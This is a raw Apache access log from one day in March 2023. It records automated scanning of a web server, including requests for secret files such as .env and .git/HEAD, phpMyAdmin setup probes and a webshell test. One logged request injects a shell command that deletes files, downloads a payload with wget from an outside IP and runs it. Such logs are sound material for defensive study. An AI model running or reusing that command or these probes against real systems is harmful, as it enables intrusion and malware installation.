::1 - - [28/Mar/2023:09:42:07 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
135.125.246.110 - - [28/Mar/2023:10:05:31 +0000] "POST / HTTP/1.1" 405 409702 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [28/Mar/2023:10:12:32 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.105.128.12 - - [28/Mar/2023:10:59:30 +0000] "\x16\x03\x01" 400 226 "-" "-"
185.180.143.11 - - [28/Mar/2023:11:20:36 +0000] "GET /solr/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [28/Mar/2023:11:20:36 +0000] "GET /solr HTTP/1.1" 200 - "http://13.244.159.169/solr/#/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [28/Mar/2023:11:20:51 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [28/Mar/2023:11:20:52 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [28/Mar/2023:11:21:07 +0000] "GET /webfig/ HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [28/Mar/2023:11:21:07 +0000] "GET /webfig HTTP/1.1" 200 - "http://13.244.159.169/webfig/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [28/Mar/2023:11:21:18 +0000] "GET /admin/ HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [28/Mar/2023:11:21:19 +0000] "GET / HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
135.125.246.110 - - [28/Mar/2023:11:26:32 +0000] "POST / HTTP/1.1" 405 409724 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [28/Mar/2023:11:31:11 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
61.3.113.183 - - [28/Mar/2023:11:49:47 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
149.129.50.37 - - [28/Mar/2023:12:04:56 +0000] "GET http://www.1ucn.com/proxychecker/index.php HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iOpus-I-M)"
193.32.162.159 - - [28/Mar/2023:12:11:08 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
::1 - - [28/Mar/2023:12:18:51 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
205.210.31.173 - - [28/Mar/2023:12:48:25 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [28/Mar/2023:12:50:03 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
45.79.181.179 - - [28/Mar/2023:13:00:10 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.246.110 - - [28/Mar/2023:13:02:17 +0000] "POST / HTTP/1.1" 405 409730 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
141.105.66.148 - - [28/Mar/2023:13:17:01 +0000] "GET / HTTP/1.0" 200 41463 "-" "-"
141.105.66.148 - - [28/Mar/2023:13:17:08 +0000] "GET /nmaplowercheck1680009428 HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:08 +0000] "GET / HTTP/1.1" 200 44149 "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:09 +0000] "GET /home.aspx HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:08 +0000] "POST /scripts/WPnBr.dll HTTP/1.1" 405 407319 "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:09 +0000] "GET /server-status HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:09 +0000] "GET /.git/HEAD HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:09 +0000] "GET /Portal0000.htm HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:09 +0000] "GET /CSS/Miniweb.css HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:10 +0000] "GET /NmapUpperCheck1680009428 HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:10 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:10 +0000] "GET /menu.shtml HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:10 +0000] "GET / HTTP/1.1" 200 44149 "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:10 +0000] "GET /__Additional HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:10 +0000] "GET /Nmap/folder/check1680009428 HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:10 +0000] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 44149 "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:11 +0000] "GET /vd3O HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:11 +0000] "GET /robots.txt HTTP/1.1" 200 24 "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:11 +0000] "GET /Portal/Portal.mwsl HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:12 +0000] "GET /docs/cplugError.html/ HTTP/1.1" 301 287 "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:12 +0000] "GET /readme.txt HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:12 +0000] "GET / HTTP/1.1" 200 44149 "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:11 +0000] "POST /functionRouter HTTP/1.1" 405 412886 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
141.105.66.148 - - [28/Mar/2023:13:17:12 +0000] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 44149 "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:12 +0000] "HEAD / HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:12 +0000] "GET /docs/cplugError.html HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:12 +0000] "GET /admin.pl HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:13 +0000] "GET / HTTP/1.0" 200 41463 "-" "-"
::1 - - [28/Mar/2023:13:17:13 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
141.105.66.148 - - [28/Mar/2023:13:17:13 +0000] "GET /admin.shtml HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:13 +0000] "GET / HTTP/1.1" 200 44149 "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:12 +0000] "POST / HTTP/1.1" 405 407363 "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:13 +0000] "GET /inicio.html HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:13 +0000] "POST /sdk HTTP/1.1" 405 406189 "-" "curl/7.54.0"
::1 - - [28/Mar/2023:13:17:14 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
141.105.66.148 - - [28/Mar/2023:13:17:14 +0000] "GET /admin.jsp HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:15 +0000] "GET /menu.pl HTTP/1.1" 200 - "-" "curl/7.54.0"
::1 - - [28/Mar/2023:13:17:15 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
141.105.66.148 - - [28/Mar/2023:13:17:15 +0000] "GET /index.shtml HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:15 +0000] "GET /tomcatwar.jsp HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:16 +0000] "GET /base.php HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:16 +0000] "GET /tomcatwar.jsp?pwd=j&cmd=id HTTP/1.1" 200 - "-" "curl/7.54.0"
::1 - - [28/Mar/2023:13:17:16 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
141.105.66.148 - - [28/Mar/2023:13:17:16 +0000] "GET /default.cgi HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:16 +0000] "GET /ghksjdghdfksanitycheckqwerjlhfgjksdghlid HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:17 +0000] "GET /base.cgi HTTP/1.1" 200 - "-" "curl/7.54.0"
::1 - - [28/Mar/2023:13:17:17 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
141.105.66.148 - - [28/Mar/2023:13:17:17 +0000] "GET /admin.html HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:18 +0000] "GET /admin.aspx HTTP/1.1" 200 - "-" "curl/7.54.0"
::1 - - [28/Mar/2023:13:17:18 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
141.105.66.148 - - [28/Mar/2023:13:17:18 +0000] "GET /start.jsa HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [28/Mar/2023:13:17:18 +0000] "\x16\x03\x01\x02" 400 226 "-" "-"
::1 - - [28/Mar/2023:13:17:19 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
141.105.66.148 - - [28/Mar/2023:13:17:19 +0000] "GET / HTTP/1.0" 200 41463 "-" "-"
::1 - - [28/Mar/2023:13:17:20 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:13:17:21 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:13:17:22 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:13:17:23 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:13:17:24 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:13:17:25 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:13:17:41 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:13:17:42 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
193.118.53.194 - - [28/Mar/2023:13:33:35 +0000] "GET / HTTP/1.1" 200 8380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.32.162.159 - - [28/Mar/2023:13:34:41 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [28/Mar/2023:14:09:30 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.246.110 - - [28/Mar/2023:14:14:32 +0000] "POST / HTTP/1.1" 405 409720 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [28/Mar/2023:14:17:24 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [28/Mar/2023:14:17:25 +0000] "POST / HTTP/1.1" 405 409728 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
205.210.31.27 - - [28/Mar/2023:14:27:27 +0000] "GET / HTTP/1.1" 200 41226 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
34.23.7.180 - - [28/Mar/2023:14:53:33 +0000] "\x16\x03\x01" 400 226 "-" "-"
34.23.7.180 - - [28/Mar/2023:14:53:36 +0000] "OPTIONS / HTTP/1.0" 200 - "-" "-"
185.131.241.240 - - [28/Mar/2023:14:58:37 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
128.199.77.96 - - [28/Mar/2023:15:19:16 +0000] "GET / HTTP/1.0" 200 41226 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0"
103.166.187.135 - - [28/Mar/2023:15:23:54 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
43.154.128.189 - - [28/Mar/2023:15:29:50 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
179.43.177.242 - - [28/Mar/2023:15:45:02 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
220.250.63.21 - - [28/Mar/2023:15:52:25 +0000] "GET / HTTP/1.0" 200 41226 "-" "-"
223.166.22.252 - - [28/Mar/2023:15:53:19 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
35.240.121.17 - - [28/Mar/2023:15:53:32 +0000] "GET / HTTP/1.1" 200 8385 "-" "python-requests/2.28.2"
101.42.152.46 - - [28/Mar/2023:16:07:42 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:43 +0000] "GET http://13.244.159.169:80/admin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:42 +0000] "GET http://13.244.159.169:80/SQL/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:42 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:42 +0000] "GET http://13.244.159.169:80/phpmanager/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:43 +0000] "GET http://13.244.159.169:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:43 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:43 +0000] "GET http://13.244.159.169:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:42 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:43 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:42 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:44 +0000] "GET http://13.244.159.169:80/webadmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:44 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:44 +0000] "GET http://13.244.159.169:80/mysql/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:44 +0000] "GET http://13.244.159.169:80/sqlmanager/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:44 +0000] "GET http://13.244.159.169:80/websql/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:44 +0000] "GET http://13.244.159.169:80/php-myadmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:44 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:44 +0000] "GET http://13.244.159.169:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:44 +0000] "GET http://13.244.159.169:80/db/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:44 +0000] "GET http://13.244.159.169:80/mysqladmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:44 +0000] "GET http://13.244.159.169:80/sqlweb/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:44 +0000] "GET http://13.244.159.169:80/php/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:44 +0000] "GET http://13.244.159.169:80/webdb/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:44 +0000] "GET http://13.244.159.169:80/phpmy-admin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:44 +0000] "GET http://13.244.159.169:80/mysql-admin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/myadmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/mysqlmanager/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/phpma/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/admin/pma/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/MyAdmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/phpmyadmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/dbadmin/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 200 - "-" "-"
101.42.152.46 - - [28/Mar/2023:16:07:45 +0000] "GET http://13.244.159.169:80/pma/scripts/setup.php HTTP/1.0" 200 - "-" "-"
::1 - - [28/Mar/2023:16:07:47 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:16:07:48 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:16:07:49 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:16:07:50 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:16:07:51 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:16:07:52 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:16:07:53 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:16:07:54 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:16:07:55 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:16:07:56 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:16:07:57 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:16:07:58 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:16:07:59 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:16:08:00 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [28/Mar/2023:16:08:01 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
45.128.232.149 - - [28/Mar/2023:16:08:33 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 405 423580 "http://13.244.159.169:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
135.125.246.110 - - [28/Mar/2023:16:10:28 +0000] "POST / HTTP/1.1" 405 409752 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
85.217.145.45 - - [28/Mar/2023:16:13:21 +0000] "GET / HTTP/1.1" 200 41226 "-" "Go-http-client/1.1"
135.125.246.110 - - [28/Mar/2023:16:21:38 +0000] "POST / HTTP/1.1" 405 409720 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [28/Mar/2023:16:50:39 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.104.11.34 - - [28/Mar/2023:16:59:47 +0000] "\x16\x03\x01" 400 226 "-" "-"
193.32.162.159 - - [28/Mar/2023:17:05:57 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
